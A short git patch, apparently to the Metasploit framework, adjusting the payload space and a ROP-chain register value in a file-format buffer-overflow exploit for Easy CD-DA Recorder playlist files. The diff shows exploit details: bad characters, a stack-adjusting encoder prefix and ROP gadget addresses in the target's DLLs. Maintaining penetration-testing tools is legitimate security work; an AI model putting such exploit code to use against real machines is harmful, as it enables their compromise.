From 184ccb9e1e3456d93d25c86ccac1e0547215413d Mon Sep 17 00:00:00 2001
From: sgabe <sgabe@server.fake>
Date: Tue, 11 Feb 2014 23:42:58 +0100
Subject: [PATCH] Fix payload size

---
 modules/exploits/windows/fileformat/easycdda_pls_bof.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
index 997edbfdda..d7dcbe63cf 100644
--- a/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/easycdda_pls_bof.rb
@@ -44,7 +44,7 @@ class Metasploit3 < Msf::Exploit::Remote
         {
           'DisableNops'    => true,
           'BadChars'       => "\x0a\x3d",
-          'Space'          => 2472,
+          'Space'          => 2454,
           'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
         },
       'Targets'        =>
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       0x1005d288,  # POP EBP # RETN [audconv.dll]
       0x004030c8,  # &PUSH ESP # RET 0x08 [easycdda.exe]
       0x1005cc2d,  # POP EBX # RETN [audconv.dll]
-      0x000009ff,  # 0x000009FF-> EBX
+      0x00000996,  # 0x00000996-> EBX
       0x1008740c,  # POP EDX # RETN [audconv.dll]
       0x00000040,  # 0x00000040-> EDX
       0x1001826d,  # POP ECX # RETN [audconv.dll]